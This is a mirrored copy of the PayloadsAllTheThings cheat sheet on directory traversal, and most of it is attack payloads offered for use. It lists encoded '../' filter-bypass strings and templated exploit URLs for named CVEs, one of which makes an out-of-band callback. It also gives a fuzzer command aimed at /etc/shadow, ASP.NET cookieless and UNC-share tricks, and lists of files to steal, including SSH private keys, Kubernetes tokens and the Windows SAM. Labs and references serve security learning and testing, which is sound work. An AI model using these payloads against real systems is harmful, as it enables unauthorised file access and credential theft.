index.md (13300B)
1 --- 2 title: "Directory Traversal" 3 topic: "Directory Traversal" 4 topicSlug: "directory-traversal" 5 sourcePath: "Directory Traversal/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Directory%20Traversal/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Directory Traversal 12 13 > Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [URL Encoding](#url-encoding) 20 * [Double URL Encoding](#double-url-encoding) 21 * [Unicode Encoding](#unicode-encoding) 22 * [Overlong UTF-8 Unicode Encoding](#overlong-utf-8-unicode-encoding) 23 * [Mangled Path](#mangled-path) 24 * [NULL Bytes](#null-bytes) 25 * [Reverse Proxy URL Implementation](#reverse-proxy-url-implementation) 26 * [Exploit](#exploit) 27 * [UNC Share](#unc-share) 28 * [ASPNET Cookieless](#asp-net-cookieless) 29 * [IIS Short Name](#iis-short-name) 30 * [Java URL Protocol](#java-url-protocol) 31 * [Path Traversal](#path-traversal) 32 * [Linux Files](#linux-files) 33 * [Windows Files](#windows-files) 34 * [Labs](#labs) 35 * [References](#references) 36 37 ## Tools 38 39 * [wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - The Directory Traversal Fuzzer 40 41 ```powershell 42 perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b 43 ``` 44 45 ## Methodology 46 47 We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. 48 49 ```powershell 50 ../ 51 ..\ 52 ..\/ 53 %2e%2e%2f 54 %252e%252e%252f 55 %c0%ae%c0%ae%c0%af 56 %uff0e%uff0e%u2215 57 %uff0e%uff0e%u2216 58 ``` 59 60 ### URL Encoding 61 62 | Character | Encoded | 63 | --------- | ------- | 64 | `.` | `%2e` | 65 | `/` | `%2f` | 66 | `\` | `%5c` | 67 68 **Example:** IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion 69 70 ```ps1 71 {{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd 72 ``` 73 74 ### Double URL Encoding 75 76 Double URL encoding is the process of applying URL encoding twice to a string. In URL encoding, special characters are replaced with a % followed by their hexadecimal ASCII value. Double encoding repeats this process on the already encoded string. 77 78 | Character | Encoded | 79 | --------- | ------- | 80 | `.` | `%252e` | 81 | `/` | `%252f` | 82 | `\` | `%255c` | 83 84 **Example:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) 85 86 ```ps1 87 {{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini 88 {{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini 89 ``` 90 91 ### Unicode Encoding 92 93 | Character | Encoded | 94 | --------- | -------- | 95 | `.` | `%u002e` | 96 | `/` | `%u2215` | 97 | `\` | `%u2216` | 98 99 **Example**: Openfire Administration Console - Authentication Bypass (CVE-2023-32315) 100 101 ```js 102 {{BaseURL}}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp 103 ``` 104 105 ### Overlong UTF-8 Unicode Encoding 106 107 The UTF-8 standard mandates that each codepoint is encoded using the minimum number of bytes necessary to represent its significant bits. Any encoding that uses more bytes than required is referred to as "overlong" and is considered invalid under the UTF-8 specification. This rule ensures a one-to-one mapping between codepoints and their valid encodings, guaranteeing that each codepoint has a single, unique representation. 108 109 | Character | Encoded | 110 | --------- | ------------------------------- | 111 | `.` | `%c0%2e`, `%e0%40%ae`, `%c0%ae` | 112 | `/` | `%c0%af`, `%e0%80%af`, `%c0%2f` | 113 | `\` | `%c0%5c`, `%c0%80%5c` | 114 115 ### Mangled Path 116 117 Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them. 118 119 ```powershell 120 ..././ 121 ...\.\ 122 ``` 123 124 **Example:**: Mirasys DVMS Workstation <=5.12.6 125 126 ```ps1 127 {{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini 128 ``` 129 130 ### NULL Bytes 131 132 A null byte (`%00`), also known as a null character, is a special control character (0x00) in many programming languages and systems. It is often used as a string terminator in languages like C and C++. In directory traversal attacks, null bytes are used to manipulate or bypass server-side input validation mechanisms. 133 134 **Example:** Homematic CCU3 CVE-2019-9726 135 136 ```js 137 {{BaseURL}}/.%00./.%00./etc/passwd 138 ``` 139 140 **Example:** Kyocera Printer d-COPIA253MF CVE-2020-23575 141 142 ```js 143 {{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm 144 ``` 145 146 ### Reverse Proxy URL Implementation 147 148 Nginx treats `/..;/` as a directory while Tomcat treats it as it would treat `/../` which allows us to access arbitrary servlets. 149 150 ```powershell 151 ..;/ 152 ``` 153 154 **Example**: Pascom Cloud Phone System CVE-2021-45967 155 156 A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints. 157 158 ```js 159 {{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}} 160 ``` 161 162 ## Exploit 163 164 These exploits affect mechanism linked to specific technologies. 165 166 ### UNC Share 167 168 A UNC (Universal Naming Convention) share is a standard format used to specify the location of resources, such as shared files, directories, or devices, on a network in a platform-independent manner. It is commonly used in Windows environments but is also supported by other operating systems. 169 170 An attacker can inject a **Windows** UNC share (`\\UNC\share\name`) into a software system to potentially redirect access to an unintended location or arbitrary file. 171 172 ```powershell 173 \\localhost\c$\windows\win.ini 174 ``` 175 176 Also the machine might also authenticate on this remote share, thus sending an NTLM exchange. 177 178 ### ASP NET Cookieless 179 180 When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it. 181 182 For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. 183 184 | .NET Version | URI | 185 | ------------ | -------------------------- | 186 | V1.0, V1.1 | /(XXXXXXXX)/ | 187 | V2.0+ | /(S(XXXXXXXX))/ | 188 | V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ | 189 | V2.0+ | ... | 190 191 We can use this behavior to bypass filtered URLs. 192 193 * If your application is in the main folder 194 195 ```ps1 196 /(S(X))/ 197 /(Y(Z))/ 198 /(G(AAA-BBB)D(CCC=DDD)E(0-1))/ 199 /(S(X))/admin/(S(X))/main.aspx 200 /(S(x))/b/(S(x))in/Navigator.dll 201 ``` 202 203 * If your application is in a subfolder 204 205 ```ps1 206 /MyApp/(S(X))/ 207 /admin/(S(X))/main.aspx 208 /admin/Foobar/(S(X))/../(S(X))/main.aspx 209 ``` 210 211 | CVE | Payload | 212 | -------------- | ---------------------------------------------- | 213 | CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx | 214 | - | /WebForm/(S(X))/b/(S(X))in/target2.aspx | 215 | CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ | 216 | - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ | 217 218 ### IIS Short Name 219 220 The IIS Short Name vulnerability exploits a quirk in Microsoft's Internet Information Services (IIS) web server that allows attackers to determine the existence of files or directories with names longer than the 8.3 format (also known as short file names) on a web server. 221 222 * [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) 223 224 ```ps1 225 java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/' 226 java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/' 227 ``` 228 229 * [bitquark/shortscan](https://github.com/bitquark/shortscan) 230 231 ```ps1 232 shortscan http://example.org/ 233 ``` 234 235 ### Java URL Protocol 236 237 Java's URL protocol when `new URL('')` is used allows the format `url:URL` 238 239 ```powershell 240 url:file:///etc/passwd 241 url:http://127.0.0.1:8080 242 ``` 243 244 ## Path Traversal 245 246 ### Linux Files 247 248 * Operating System and Informations 249 250 ```powershell 251 /etc/issue 252 /etc/group 253 /etc/hosts 254 /etc/motd 255 ``` 256 257 * Processes 258 259 ```ps1 260 /proc/[0-9]*/fd/[0-9]* # first number is the PID, second is the filedescriptor 261 /proc/self/environ 262 /proc/version 263 /proc/cmdline 264 /proc/sched_debug 265 /proc/mounts 266 ``` 267 268 * Network 269 270 ```ps1 271 /proc/net/arp 272 /proc/net/route 273 /proc/net/tcp 274 /proc/net/udp 275 ``` 276 277 * Current Path 278 279 ```ps1 280 /proc/self/cwd/index.php 281 /proc/self/cwd/main.py 282 ``` 283 284 * Indexing 285 286 ```ps1 287 /var/lib/mlocate/mlocate.db 288 /var/lib/plocate/plocate.db 289 /var/lib/mlocate.db 290 ``` 291 292 * Credentials and history 293 294 ```ps1 295 /etc/passwd 296 /etc/shadow 297 /home/$USER/.bash_history 298 /home/$USER/.ssh/id_rsa 299 /etc/mysql/my.cnf 300 ``` 301 302 * Kubernetes 303 304 ```ps1 305 /run/secrets/kubernetes.io/serviceaccount/token 306 /run/secrets/kubernetes.io/serviceaccount/namespace 307 /run/secrets/kubernetes.io/serviceaccount/certificate 308 /var/run/secrets/kubernetes.io/serviceaccount 309 ``` 310 311 ### Windows Files 312 313 The files `license.rtf` and `win.ini` are consistently present on modern Windows systems, making them a reliable target for testing path traversal vulnerabilities. While their content isn't particularly sensitive or interesting, they serves well as a proof of concept. 314 315 ```powershell 316 C:\Windows\win.ini 317 C:\windows\system32\license.rtf 318 ``` 319 320 A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system: [soffensive/windowsblindread](https://github.com/soffensive/windowsblindread) 321 322 ```powershell 323 c:/inetpub/logs/logfiles 324 c:/inetpub/wwwroot/global.asa 325 c:/inetpub/wwwroot/index.asp 326 c:/inetpub/wwwroot/web.config 327 c:/sysprep.inf 328 c:/sysprep.xml 329 c:/sysprep/sysprep.inf 330 c:/sysprep/sysprep.xml 331 c:/system32/inetsrv/metabase.xml 332 c:/sysprep.inf 333 c:/sysprep.xml 334 c:/sysprep/sysprep.inf 335 c:/sysprep/sysprep.xml 336 c:/system volume information/wpsettings.dat 337 c:/system32/inetsrv/metabase.xml 338 c:/unattend.txt 339 c:/unattend.xml 340 c:/unattended.txt 341 c:/unattended.xml 342 c:/windows/repair/sam 343 c:/windows/repair/system 344 ``` 345 346 ## Labs 347 348 * [PortSwigger - File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple) 349 * [PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass) 350 * [PortSwigger - File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively) 351 * [PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode) 352 * [PortSwigger - File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path) 353 * [PortSwigger - File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass) 354 355 ## References 356 357 * [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://web.archive.org/web/20241202163755/https://twitter.com/irsdl/status/1640390106312835072) 358 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://web.archive.org/web/20080115180212/http://cwe.mitre.org:80/data/definitions/40.html) 359 * [Directory traversal - Portswigger - March 30, 2019](https://web.archive.org/web/20190330191447/https://portswigger.net/web-security/file-path-traversal) 360 * [Directory traversal attack - Wikipedia - August 5, 2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack) 361 * [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://web.archive.org/web/20240323234120/https://youtu.be/YlZGJ28By8U) 362 * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - June 19, 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) 363 * [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381) 364 * [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/) 365 * [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))